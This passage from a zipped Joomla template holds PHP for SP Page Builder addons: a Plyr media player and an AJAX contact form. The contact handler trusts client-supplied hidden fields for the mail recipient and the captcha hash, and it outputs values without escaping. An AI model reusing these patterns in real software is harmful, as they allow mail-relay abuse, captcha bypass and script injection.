					'placeholder'=>JText::_('FLEX_ADDON_PLYR_YOUTUBE_VIMEO_URL_PLACEHOLDER'),
					'std'=>'',
					'depends'=>array('media'=>'3')
					),
			
				'separator2'=>array(
					'type'=>'separator', 
					'title'=>JText::_('FLEX_ADDON_PLYR_SEPARATOR_SETTINGS')
					),	
					
				'autoplay'=>array(
					'type'=>'checkbox', 
					'title'=>JText::_('FLEX_ADDON_PLYR_AUTOPLAY'),
					'desc'=>JText::_('FLEX_ADDON_PLYR_AUTOPLAY_DESC'),
					'values'=>array(
						1=>JText::_('JYES'),
						0=>JText::_('JNO'),
					),
					'std'=>0,
					),
				'captions_toggle'=>array(
					'type'=>'checkbox', 
					'title'=>JText::_('FLEX_ADDON_PLYR_TOGGLE_CAPTIONS'),
					'desc'=>JText::_('FLEX_ADDON_PLYR_TOGGLE_CAPTIONS_DESC'),
					'values'=>array(
						1=>JText::_('JYES'),
						0=>JText::_('JNO'),
					),
					'std'=>1,
					'depends'=>array('media'=>'1')
					),
				'tooltips'=>array(
					'type'=>'checkbox', 
					'title'=>JText::_('FLEX_ADDON_PLYR_TOOLTIPS'),
					'desc'=>JText::_('FLEX_ADDON_PLYR_TOOLTIPS_DESC'),
					'values'=>array(
						1=>JText::_('JYES'),
						0=>JText::_('JNO'),
					),
					'std'=>0,
					),
				'class'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS_DESC'),
					'std'=>''
				),
			),
		),
	)
);PK!�� .'flex/sppagebuilder/addons/plyr/site.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2018 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined ('_JEXEC') or die ('restricted aceess');

class SppagebuilderAddonPlyr extends SppagebuilderAddons{

	public function render() {
		
		$app = JFactory::getApplication();

		$class = (isset($this->addon->settings->class) && $this->addon->settings->class) ? $this->addon->settings->class : '';
		$title = (isset($this->addon->settings->title) && $this->addon->settings->title) ? $this->addon->settings->title : '';
		$heading_selector = (isset($this->addon->settings->heading_selector) && $this->addon->settings->heading_selector) ? $this->addon->settings->heading_selector : 'h3';
		
		$media = (isset($this->addon->settings->media) && $this->addon->settings->media) ? $this->addon->settings->media : '';
		$video = (isset($this->addon->settings->video) && $this->addon->settings->video) ? $this->addon->settings->video : '';
		$video_poster = (isset($this->addon->settings->video_poster) && $this->addon->settings->video_poster) ? $this->addon->settings->video_poster : '';
		$captions = (isset($this->addon->settings->captions) && $this->addon->settings->captions) ? $this->addon->settings->captions : '';
		$captions_lang_label = (isset($this->addon->settings->captions_lang_label) && $this->addon->settings->captions_lang_label) ? $this->addon->settings->captions_lang_label : '';
		$captions_srclang = (isset($this->addon->settings->captions_srclang) && $this->addon->settings->captions_srclang) ? $this->addon->settings->captions_srclang : '';
		$audio = (isset($this->addon->settings->audio) && $this->addon->settings->audio) ? $this->addon->settings->audio : '';
		$youtube_vimeo_url = (isset($this->addon->settings->youtube_vimeo_url) && $this->addon->settings->youtube_vimeo_url) ? $this->addon->settings->youtube_vimeo_url : '';
		$autoplay = (isset($this->addon->settings->autoplay) && $this->addon->settings->autoplay) ? $this->addon->settings->autoplay : '';
		
		$captions_toggle = (isset($this->addon->settings->captions_toggle) && $this->addon->settings->captions_toggle) ? $this->addon->settings->captions_toggle : '';
		$tooltips = (isset($this->addon->settings->tooltips) && $this->addon->settings->tooltips) ? $this->addon->settings->tooltips : '';
		
		$randomid = rand(1,1000); //random ID number to avoid conflict if there is more then one Plyr media player on the same page
		
		$autoplay == '1' ? $autoplay = 'autoplay:true,' : $autoplay = '';
		$captions_toggle == '1' ? $captions_toggle = 'captions:{defaultActive:true},' : $captions_toggle = '';
		$tooltips == '1' ? $tooltips = 'tooltips:{controls:true,seek:true},' : $tooltips = '';
		
		$show_captions = '';
		$src_captions = '';
		$show_minimal = '';
		$src_video = '';
		$src_video_poster = '';
		$src_audio = '';
		$data_type = '';


	$class != '' ? $class = ' ' . $class : $class = '';
	
	if($video) {
		if (false === strpos($video, '://')) {
		    $src_video = JURI::root() . $video;
		} else {
			$src_video = $video;
		}
	}
	
	if($video_poster) {
		if (false === strpos($video_poster, '://')) {
		    $src_video_poster = JURI::root() . $video_poster;
		} else {
			$src_video_poster = $video_poster;
		}
	}	
	
	if($captions) {
		if (false === strpos($captions, '://')) {
		    $src_captions = JURI::root() . $captions;
		} else {
			$src_captions = $captions;
		}
		$show_captions = '\'captions\', ';
	}
	
	if($audio) {
		if (false === strpos($audio, '://')) {
		    $src_audio = JURI::root() . $audio;
		} else {
			$src_audio = $audio;
		}
	}

	if($youtube_vimeo_url) {

		$yv_video = parse_url($youtube_vimeo_url);
		
		switch($yv_video['host']) {
			case 'youtu.be':
				$id = trim($yv_video['path'],'/');
				$src_youtube = $id;
				$data_type = 'youtube';
			break;
			
			case 'www.youtube.com':
			case 'youtube.com':
				parse_str($yv_video['query'], $query);
				$id = $query['v'];
				$src_youtube = $id;
				$data_type = 'youtube';
			break;
			
			case 'vimeo.com':
			case 'www.vimeo.com':
				$id = trim($yv_video['path'],'/');
				$src_vimeo = $id;
				$data_type = 'vimeo';
		}
	}
	
		$output  = '<div class="sppb-addon sppb-addon-plyr' . $class . '">';

		if($title) {

			$title_style = '';
			if($title_margin_top) $title_style .= 'margin-top:' . (int) $title_margin_top . 'px;';
			if($title_margin_bottom) $title_style .= 'margin-bottom:' . (int) $title_margin_bottom . 'px;';
			if($title_text_color) $title_style .= 'color:' . $title_text_color  . ';';
			if($title_fontsize) $title_style .= 'font-size:'.$title_fontsize.'px;line-height:'.$title_fontsize.'px;';
			if($title_fontweight) $title_style .= 'font-weight:'.$title_fontweight.';';

			$output .= '<'.$heading_selector.' class="sppb-addon-title" style="' . $title_style . '">' . $title . '</'.$heading_selector.'>';
		}

		// Plyr Starts
		
		if ($media == '1') {		
			$output .= '<div id="plyr-media-player-'.$randomid.'">';
			$output .= '<video poster="'.$src_video_poster.'" controls crossorigin>';
			$output .= '<source src="'.$src_video.'" type="video/mp4">';
			$output .= '<!-- Text track file -->';
			$output .= '<track kind="captions" label="'.$captions_lang_label.'" srclang="'.$captions_srclang.'" src="'.$src_captions.'" default>';
			$output .= '<!-- Fallback for browsers that don’t support the <video> element -->';
			$output .= '<a href="'.$src_video.'">'. JText::_('FLEX_DOWNLOAD') .'</a>';
			$output .= '</video>';
			$output .= '</div>';
		}
		
		if ($media == '2') {	
			// Audio Player
			$output .= '<div id="plyr-media-player-'.$randomid.'">';
			$output .= '<audio controls>
			<source src="' . $src_audio . '" type="audio/mp3"><a href="' . $src_audio . '">'. JText::_('FLEX_DOWNLOAD') .'</a>
			</audio>';
			$output .= '</div>';
		}
		
		
		if ($media == '3') {	
			// Youtube 		
			if ($data_type == "youtube") {
				$output .= '<div id="plyr-media-player-'.$randomid.'"><div data-video-id="'.$src_youtube.'" data-type="'.$data_type.'"></div></div>';
			}
			// Vimeo
			if ($data_type == "vimeo") {
			$output .= '<div id="plyr-media-player-'.$randomid.'"><div data-video-id="'.$src_vimeo.'" data-type="vimeo"></div></div>';
			}
		
		}
		
		$output .= '</div>';
		
		// Add JS at the end
	    $output .= '<script type="text/javascript">
		var player = plyr.setup(\'#plyr-media-player-'.$randomid.'\', {
		'.$autoplay.'
		showPosterOnEnd: true,
		controls: [\'play-large\', \'play\', \'progress\', \'current-time\', \'mute\', \'volume\', '.$show_captions.'\'fullscreen\'],
		i18n: {
			play:"'. JText::_('FLEX_ADDON_PLYR_PLAY') .'",
			pause:"'. JText::_('FLEX_ADDON_PLYR_PAUSE') .'",
			toggleMute:"'. JText::_('FLEX_ADDON_PLYR_TOGGLE_MUTE') .'",
			toggleCaptions:"'. JText::_('FLEX_ADDON_PLYR_TOGGLE_CAPTIONS') .'",
			toggleFullscreen:"'. JText::_('FLEX_ADDON_PLYR_TOGGLE_FULLSCREEN') .'"
		},
		'.$captions_toggle.'
		'.$tooltips.'
		volume: 7,
		iconUrl:"'.JURI::base(true) . '/templates/'.$app->getTemplate().'/sppagebuilder/addons/plyr/assets/css/plyr.svg"
		});</script>';
		
		$output = preg_replace('/[\n\t]+/m', '', $output); // Remove whitespace
		
		return $output;
	}
	
	
	public function stylesheets() {
		$app = JFactory::getApplication();
		$tmplPath = JURI::base(true) . '/templates/'.$app->getTemplate();	
		return array( $tmplPath.'/sppagebuilder/addons/plyr/assets/css/plyr.css');
	}
	

	public function scripts() {
		$app = JFactory::getApplication();
		$tmplPath = JURI::base(true) . '/templates/'.$app->getTemplate();	
		return array( $tmplPath.'/sppagebuilder/addons/plyr/assets/js/plyr.js');
	}

}
PK!�A.�.�/flex/sppagebuilder/addons/ajax_contact/site.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2019 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined('_JEXEC') or die('Restricted access');

class SppagebuilderAddonAjax_contact extends SppagebuilderAddons {

    public function render() {

        //CSRF
        \JHtml::_('jquery.token');

        $settings = $this->addon->settings;
        $class = (isset($settings->class) && $settings->class) ? $settings->class : '';
        $title = (isset($settings->title) && $settings->title) ? $settings->title : '';
        $heading_selector = (isset($settings->heading_selector) && $settings->heading_selector) ? $settings->heading_selector : 'h3';

        // Addon options
		$styles = (isset($this->addon->settings->styles) && $this->addon->settings->styles) ? $this->addon->settings->styles : '';
        $recipient_email    = (isset($settings->recipient_email) && $settings->recipient_email) ? $settings->recipient_email : '';
        $from_email         = (isset($settings->from_email) && $settings->from_email) ? $settings->from_email : '';
        $from_name          = (isset($settings->from_name) && $settings->from_name) ? $settings->from_name : '';
        $show_phone         = (isset($settings->show_phone) && $settings->show_phone) ? $settings->show_phone : '';
        $formcaptcha        = (isset($settings->formcaptcha) && $settings->formcaptcha) ? $settings->formcaptcha : '';
        $captcha_type       = (isset($settings->captcha_type)) ? $settings->captcha_type : 'default';
        $captcha_question   = (isset($settings->captcha_question) && $settings->captcha_question) ? $settings->captcha_question : '';
        $captcha_answer     = (isset($settings->captcha_answer) && $settings->captcha_answer) ? $settings->captcha_answer : '';
        $button_text        = JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_SEND');
        $use_custom_button  = (isset($settings->use_custom_button) && $settings->use_custom_button) ? $settings->use_custom_button : 0;
        $show_checkbox      = (isset($settings->show_checkbox) && $settings->show_checkbox) ? $settings->show_checkbox : 0;
        $checkbox_title     = (isset($settings->checkbox_title) && $settings->checkbox_title) ? $settings->checkbox_title : '';
        $button_class       = (isset($settings->button_type) && $settings->button_type) ? ' sppb-btn-' . $settings->button_type : ' sppb-btn-success';
		
        $button_text = (isset($settings->button_text) && $settings->button_text) ? $settings->button_text : JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_SEND');
        $button_aria_text = (isset($settings->button_text) && $settings->button_text) ? $settings->button_text : JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_SEND');

        $name_input_col = (isset($settings->name_input_col) && $settings->name_input_col) ? ' sppb-col-sm-' . $settings->name_input_col : 'sppb-col-sm-12';
        $email_input_col = (isset($settings->email_input_col) && $settings->email_input_col) ? ' sppb-col-sm-' . $settings->email_input_col : 'sppb-col-sm-12';
        $captcha_input_col = (isset($settings->captcha_input_col) && $settings->captcha_input_col) ? ' sppb-col-sm-' . $settings->captcha_input_col : 'sppb-col-sm-12';
        $subject_input_col = (isset($settings->subject_input_col) && $settings->subject_input_col) ? ' sppb-col-sm-' . $settings->subject_input_col : 'sppb-col-sm-12';
        $phone_input_col = (isset($settings->phone_input_col) && $settings->phone_input_col) ? ' sppb-col-sm-' . $settings->phone_input_col : 'sppb-col-sm-12';
        $message_input_col = (isset($settings->message_input_col) && $settings->message_input_col) ? ' sppb-col-sm-' . $settings->message_input_col : 'sppb-col-sm-12';

        $show_label = (isset($settings->show_label) && $settings->show_label) ? $settings->show_label : false;
        $button_position = (isset($settings->button_position) && $settings->button_position) ? $settings->button_position : 'sppb-text-left';

        if ($use_custom_button) {
            $button_text = (isset($settings->button_text) && $settings->button_text) ? $settings->button_text : JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_SEND');
            $button_class .= (isset($settings->button_size) && $settings->button_size) ? ' sppb-btn-' . $settings->button_size : '';
            $button_class .= (isset($settings->button_shape) && $settings->button_shape) ? ' sppb-btn-' . $settings->button_shape : ' sppb-btn-rounded';
            $button_class .= (isset($settings->button_appearance) && $settings->button_appearance) ? ' sppb-btn-' . $settings->button_appearance : '';
            $button_class .= (isset($settings->button_block) && $settings->button_block) ? ' ' . $settings->button_block : '';
			
			//Pixeden Icons
			$button_peicon = (isset($this->addon->settings->button_peicon) && $this->addon->settings->button_peicon) ? $this->addon->settings->button_peicon : '';
			
            $button_icon = (isset($settings->button_icon) && $settings->button_icon) ? $settings->button_icon : '';
            $button_icon_position = (isset($settings->button_icon_position) && $settings->button_icon_position) ? $settings->button_icon_position : 'left';
			
			if($button_icon_position == 'left') {
				if ($button_peicon != '') {
					$button_text = ($button_peicon) ? '<i class="pe ' . $button_peicon . '"></i> ' . $button_text : $button_text;
				}else{
					$button_text = ($button_icon) ? '<i class="fa ' . $button_icon . '"></i> ' . $button_text : $button_text;
				}
			} else {
				if ($button_peicon != '') {
					$button_text = ($button_peicon) ? $button_text . ' <i style="margin-left:7px;margin-right:-1px;" class="pe ' . $button_peicon . '"></i>' : $button_text;
				}else{
					$button_text = ($button_icon) ? $button_text . ' <i style="margin-left:5px;margin-right:-1px;" class="fa ' . $button_icon . '"></i>' : $button_text;
				}
			}
        }
		
		$styles != 'default' ? $cf_styles = ' ' . $styles : $cf_styles = '';

		$output  = '<div class="sppb-addon sppb-addon-ajax-contact' . $cf_styles . $class . '">';

        //$output = '<div class="sppb-addon sppb-addon-ajax-contact ' . $class . '">';

        if ($title) {
            $output .= '<' . $heading_selector . ' class="sppb-addon-title">' . $title . '</' . $heading_selector . '>';
        }

        $output .= '<div class="sppb-ajax-contact-content">';
            $output .= '<form class="sppb-ajaxt-contact-form">';
                $output .= '<div class="sppb-row">';

                    $output .= '<div class="sppb-form-group ' . $name_input_col . '">';
                        if ($show_label) {
                            $output .= '<label for="name">' . JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_NAME') . '</label>';
                        }
                        $output .= '<input type="text" name="name" class="sppb-form-control" placeholder="' . JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_NAME') . '" required="required">';
                    $output .= '</div>';

                    $output .= '<div class="sppb-form-group ' . $email_input_col . '">';
                        if ($show_label) {
                            $output .= '<label for="email">' . JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_EMAIL') . '</label>';
                        }
                        $output .= '<input type="email" name="email" class="sppb-form-control" placeholder="' . JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_EMAIL') . '" required="required">';
                    $output .= '</div>';

                    if ($show_phone) {
                        $output .= '<div class="sppb-form-group ' . $phone_input_col . '">';
                            if ($show_label) {
                                $output .= '<label for="phone">' . JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_PHONE') . '</label>';
                            }
                            $output .= '<input type="text" name="phone" class="sppb-form-control" placeholder="' . JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_PHONE') . '" required="required">';
                        $output .= '</div>';
                    }

                    $output .= '<div class="sppb-form-group ' . $subject_input_col . '">';
                        if ($show_label) {
                            $output .= '<label for="subject">' . JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_SUBJECT') . '</label>';
                        }
                        $output .= '<input type="text" name="subject" class="sppb-form-control" placeholder="' . JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_SUBJECT') . '" required="required">';
                    $output .= '</div>';

                    if ($formcaptcha && $captcha_type == 'default') {
                        $output .= '<div class="sppb-form-group ' . $captcha_input_col . '">';
                            if ($show_label) {
                                $output .= '<label for="captcha_question">' . $captcha_question . '</label>';
                            }
                            $output .= '<input type="text" name="captcha_question" class="sppb-form-control" placeholder="' . $captcha_question . '" required="required">';
                        $output .= '</div>';
                    }

                    $output .= '<div class="sppb-form-group ' . $message_input_col . '">';
                        if ($show_label) {
                            $output .= '<label for="message">' . JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_MESSAGE') . '</label>';
                        }
                        $output .= '<textarea name="message" rows="5" class="sppb-form-control" placeholder="' . JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_MESSAGE') . '" required="required"></textarea>';
                    $output .= '</div>';

                $output .= '</div>';

                $output .= '<input type="hidden" name="recipient" value="' . base64_encode($recipient_email) . '">';
                $output .= '<input type="hidden" name="from_email" value="' . base64_encode($from_email) . '">';
                $output .= '<input type="hidden" name="from_name" value="' . base64_encode($from_name) . '">';
                $output .= '<input type="hidden" name="addon_id" value="'. $this->addon->id .'">';

                if ($formcaptcha && $captcha_type == 'default') {
                    $output .= '<input type="hidden" name="captcha_answer" value="' . md5($captcha_answer) . '">';
                } elseif ($formcaptcha && $captcha_type == 'gcaptcha') {
                    JPluginHelper::importPlugin('captcha', 'recaptcha');
                    $dispatcher = JDispatcher::getInstance();
                    $dispatcher->trigger('onInit', 'dynamic_recaptcha_' . $this->addon->id);
                    $recaptcha = $dispatcher->trigger('onDisplay', array(null, 'dynamic_recaptcha_' . $this->addon->id, 'class="sppb-dynamic-recaptcha"'));
                    
                    $output .= (isset($recaptcha[0])) ? $recaptcha[0] : '<p class="sppb-text-danger">' . JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_CAPTCHA_NOT_INSTALLED') . '</p>';
                } elseif ($formcaptcha && $captcha_type == 'igcaptcha') {
                    JPluginHelper::importPlugin('captcha', 'recaptcha_invisible');
                    $dispatcher = JDispatcher::getInstance();
                    $dispatcher->trigger('onInit', 'invisible_recaptcha_' . $this->addon->id);
                    $recaptcha = $dispatcher->trigger('onDisplay', array(null, 'invisible_recaptcha_' . $this->addon->id, 'class="sppb-dynamic-recaptcha"'));

                    $output .= (isset($recaptcha[0])) ? $recaptcha[0] : '<p class="sppb-text-danger">' . JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_INVISIBLE_CAPTCHA_NOT_INSTALLED') . '</p>';
                }
			
				if ($show_checkbox) {
                    $output .='<div class="tos">';
                        $output .='<label class="sppb-form-check-label" for="agreement">';
                        $output .='<input class="sppb-form-check-input" type="checkbox" name="agreement" id="agreement" required="required"> ' . $checkbox_title;
                        //$output .='<label class="sppb-form-check-label" for="agreement">' . $checkbox_title  . '</label>';
                        $output .='</label>';
                    $output .='</div>';
                }
				
				$output .= '<input type="hidden" name="captcha_type" value="' . $captcha_type . '">';
                $output .= '<div class="'.$button_position.'">';
                $output .= '<button type="submit" id="btn-' . $this->addon->id . '" aria-label="'. strip_tags($button_aria_text) .'" class="sppb-btn' . $button_class . '"><i class="fa"></i>' . $button_text . '</button>';
                
                $output .= '</div>';
            $output .= '</form>';
        $output .= '<div style="display:none;margin-top:10px;" class="sppb-ajax-contact-status"></div>';

        $output .= '</div>';

        $output .= '</div>';

        return $output;
    }

    public static function getAjax() {
        
        // Check CSRF
        \JSession::checkToken() or die('Restricted Access');

        require_once JPATH_BASE . '/components/com_sppagebuilder/models/page.php';

        $input = JFactory::getApplication()->input;
        $model = new SppagebuilderModelPage();
        $item_data = $model->getItem($input->get('id', 0, 'INT'));
        
        $mail = JFactory::getMailer();
        $message = '';
        $showcaptcha = false;

        //inputs
        $inputs = $input->get('data', array(), 'ARRAY');

        foreach ($inputs as $input) {

            if ($input['name'] == 'captcha_type') {
                $captcha_type = $input['value'];
            }

            if( $input['name'] == 'view_type' ) {
				$view_type		= $input['value'];
			}

            if ($input['name'] == 'addon_id') {
                $addon_id = $input['value'];
            }

			if( $input['name'] == 'module_id' ) {
				$module_id		= $input['value'];
			}

            if ($input['name'] == 'recipient') {
                $recipient = base64_decode($input['value']);
            }

            if ($input['name'] == 'from_email') {
                $from_email = base64_decode($input['value']);
            }

            if ($input['name'] == 'from_name') {
                $from_name = base64_decode($input['value']);
            }

            if ($input['name'] == 'email') {
                $email = $input['value'];
            }

            if ($input['name'] == 'name') {
                $name = $input['value'];
            }

            if ($input['name'] == 'subject') {
                $subject = $input['value'];
            }

            if ($input['name'] == 'phone') {
                $phone = $input['value'];
            }

            if ($input['name'] == 'message') {
                $message = nl2br($input['value']);
            }

            if ($input['name'] == 'captcha_question') {
                $captcha_question = $input['value'];
            }
            
            if ($input['name'] == 'captcha_answer') {
                $captcha_answer = $input['value'];
                $showcaptcha = true;
            }
            
            if ($input['name'] == 'g-recaptcha-response') {
                $gcaptcha = $input['value'];
                $showcaptcha = true;
            }
            if ($input['name'] == 'agreement') { 
                $agreement = $input['value'];
            }
        }
		/*
		// get addon infos
		if( $view_type == 'module' ) {
            $item_data = new stdClass();
            $page_info = self::getPageInfoById( $module_id, $view_type, 'new');

            if(empty($page_info)) { // if old version of module
                $page_info       = self::getPageInfoById( $module_id, $view_type);
                $item_data->text = json_encode(json_decode($page_info->params)->content);
            } else { // if new version of module
				$item_data->text = $page_info->text;
            }
			
        } elseif( $view_type == 'article' ) {
            $item_data = new stdClass();
            $item_data = self::getPageInfoById( $viewid, $view_type );
        } else {
            $model = new SppagebuilderModelPage();
            $item_data = $model->getItem($viewid);
        }
		*/

        $output = array();
        $output['status'] = false;

        // Match has addon id (needs fix, because sending emails with "failed message", SPPB 3.4.5)
		/*
		if(!preg_match('/({"id":'.$addon_id.',"name":"ajax_contact"(.*?){(.*?)}(.*?)]})/', $item_data->text)) {
            $output['content'] = '<span class="sppb-text-danger">' . JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_FAILED') . '</span>';
            return json_encode($output);
        }
		*/
		if ($showcaptcha) {
            if ($captcha_type == 'gcaptcha' || $captcha_type == 'igcaptcha') {
                if($gcaptcha == ''){
                    $output['content'] = '<span class="sppb-text-danger">' . JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_INVALID_CAPTCHA') . '</span>';
                    return json_encode($output);
                } else {
                    if($captcha_type == 'igcaptcha') {
                        JPluginHelper::importPlugin('captcha', 'recaptcha_invisible');
                    } else {
                        JPluginHelper::importPlugin('captcha', 'recaptcha');
                    }
                    $dispatcher = JEventDispatcher::getInstance();
                    $res = $dispatcher->trigger('onCheckAnswer', $gcaptcha);
                    // if module then verify gcaptcha
                    if($view_type == 'module'){
                        $res = ($gcaptcha != null || strlen($gcaptcha) != 0) ? array(true) : array(false);
                    }
                    if (!$res[0]) {
                        $output['content'] = '<span class="sppb-text-danger">' . JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_INVALID_CAPTCHA') . '</span>';
                        return json_encode($output);
                    }
                }
            } else {
                if (md5($captcha_question) != $captcha_answer) {
                    $output['content'] = '<span class="sppb-text-danger">' . JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_WRONG_CAPTCHA') . '</span>';
                    return json_encode($output);
                }
            }
        }


        //get sender UP
        $senderip       = isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR'];
        // Subject Structure
        $site_name 	    = isset($_SERVER['SERVER_NAME']) ? $_SERVER['SERVER_NAME'] : '';
        $mail_subject   = $subject . ' | ' . $email . ' | ' . $site_name;

        // Message structure
        $mail_body = '<div>';
            if (isset($name) && $name) {
                $mail_body .= '<p><strong>' . JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_NAME'). '</strong>: ' . $name .'</p>';
            }
            $mail_body .= '<p><strong>' . JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_EMAIL'). '</strong>: ' . $email .'</p>';
            if (isset($phone) && $phone) {
                $mail_body .= '<p><strong>' . JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_PHONE'). '</strong>: ' . $phone .'</p>';
            }
            if (isset($message) && $message) {
                $mail_body .= '<p><strong>' . JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_MESSAGE'). '</strong>: ' . $message .'</p>';
            }
            if (isset($agreement) && $agreement) {
                $mail_body .= '<p><strong>' . JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_TAC'). '</strong>: ' . JText::_('JYES'). '</p>';
            } else {
                $mail_body .= '<p><strong>' . JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_TAC'). '</strong>: ' . JText::_('JNO'). '</p>';
            }
            $mail_body .= '<p><strong>' . JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_SENDER_IP'). '</strong>: ' . $senderip .'</p>';
        $mail_body .= '</div>';

        $sender = array($email, $name);
        if (!empty($from_email)) {
            $sender = array($from_email, $from_name);
            $mail->addReplyTo($email, $name);
        }

        $mail->setSender($sender);
        $mail->addRecipient($recipient);
        $mail->setSubject($mail_subject);
        $mail->isHTML(true);
        $mail->Encoding = 'base64';
        $mail->setBody($mail_body);

        if ($mail->Send()) {
            $output['status'] = true;
            $output['content'] = '<span class="sppb-text-success">' . JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_SUCCESS') . '</span>';
        } else {
            $output['content'] = '<span class="sppb-text-danger">' . JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_FAILED') . '</span>';
        }

        return json_encode($output);
    }

	public static function getPageInfoById($item_id, $view_type = 'page', $version = ''){
		$db = JFactory::getDbo();
		$query = $db->getQuery(true);
		$query->select( array('a.*') );
		if($view_type == 'module') {
            if($version == 'new') {
                $query->from($db->quoteName('#__sppagebuilder', 'a'));
				$query->where($db->quoteName('a.extension_view') . " = " . $db->quote('module'));
				$query->where($db->quoteName('a.view_id') . " = " . $db->quote((int) $item_id));
            } else {
                $query->from($db->quoteName('#__modules', 'a'));
			    $query->where($db->quoteName('a.id') . " = " . $db->quote((int) $item_id));
            }
		} else if($view_type == 'article') {
			$query->from($db->quoteName('#__sppagebuilder', 'a'));
			$query->where($db->quoteName('a.view_id') . " = " . $db->quote((int) $item_id));
		} else {
			$query->from($db->quoteName('#__sppagebuilder', 'a'));
			$query->where($db->quoteName('a.id') . " = " . $db->quote((int) $item_id));
		}
		$db->setQuery($query);
		$result = $db->loadObject();

		return $result;
    }
	

    public function css() {
        $settings = $this->addon->settings;
        $addon_id = '#sppb-addon-' . $this->addon->id;
        $layout_path = JPATH_ROOT . '/components/com_sppagebuilder/layouts';
        $css_path = new JLayoutFile('addon.css.button', $layout_path);
        $css = '';

        $use_custom_button = (isset($settings->use_custom_button) && $settings->use_custom_button) ? $settings->use_custom_button : 0;

        if ($use_custom_button) {
            $css .= $css_path->render(array('addon_id' => $addon_id, 'options' => $this->addon->settings, 'id' => 'btn-' . $this->addon->id));
        }
        //Input Style
        $input_style = '';
        $input_style .= (isset($settings->field_bg_color) && $settings->field_bg_color) ? 'background: ' . $settings->field_bg_color . ';' : '';
        $input_style .= (isset($settings->field_color) && $settings->field_color) ? 'color: ' . $settings->field_color . ';' : '';
        $input_style .= (isset($settings->field_font_size) && $settings->field_font_size) ? 'font-size: ' . $settings->field_font_size . 'px;' : '';
        $input_style .= (isset($settings->field_border_color) && $settings->field_border_color) ? 'border-color: ' . $settings->field_border_color . ';' : '';
        $input_style .= (isset($settings->field_border_width) && trim($settings->field_border_width)) ? 'border-width: ' . $settings->field_border_width . ';' : '';
        $input_style .= (isset($settings->field_border_radius) && gettype($settings->field_border_radius) == 'string') ? 'border-radius: ' . $settings->field_border_radius . 'px;' : '';
        $input_style .= (isset($settings->field_padding) && trim($settings->field_padding)) ? 'padding: ' . $settings->field_padding . ';' : '';

        $field_margin = (isset($settings->field_margin) && trim($settings->field_margin)) ? 'margin: ' . $settings->field_margin . ';' : '';

        $input_height = (isset($settings->input_height) && $settings->input_height) ? 'height: ' . $settings->input_height . 'px;' : '';
        $textarea_height = (isset($settings->textarea_height) && $settings->textarea_height) ? 'height: ' . $settings->textarea_height . 'px;' : '';
        $field_placeholder_color = (isset($settings->field_placeholder_color) && $settings->field_placeholder_color) ? 'color: ' . $settings->field_placeholder_color . ';' : '';
        $field_hover_placeholder_color = (isset($settings->field_hover_placeholder_color) && $settings->field_hover_placeholder_color) ? 'color: ' . $settings->field_hover_placeholder_color . ';' : '';
        $field_hover_style ='';
        $field_hover_style .= (isset($settings->field_hover_bg_color) && $settings->field_hover_bg_color) ? 'background: ' . $settings->field_hover_bg_color . ';' : '';
        $field_hover_style .= (isset($settings->field_hover_color) && $settings->field_hover_color) ? 'color: ' . $settings->field_hover_color . ';' : '';
        $field_hover_style .= (isset($settings->field_focus_border_color) && $settings->field_focus_border_color) ? 'border-color: ' . $settings->field_focus_border_color . ';' : '';
        
        if($input_style || $input_height){
            $css .= '#sppb-addon-' . $this->addon->id . ' .sppb-ajaxt-contact-form .sppb-form-group input:not(.sppb-form-check-input) {';
                $css .= $input_style;
                $css .= $input_height;
                $css .= 'transition:.35s;';
            $css .= '}';
        }
        if($input_style || $textarea_height){
            $css .= '#sppb-addon-' . $this->addon->id . ' .sppb-ajaxt-contact-form div.sppb-form-group textarea{';
                $css .= $input_style;
                $css .= $textarea_height;
                $css .= 'transition:.35s;';
            $css .= '}';
        }
        if($field_margin){
            $css .= '#sppb-addon-' . $this->addon->id . ' .sppb-ajaxt-contact-form div.sppb-form-group {';
                $css .= $field_margin;
            $css .= '}';
        }
        if($field_placeholder_color){
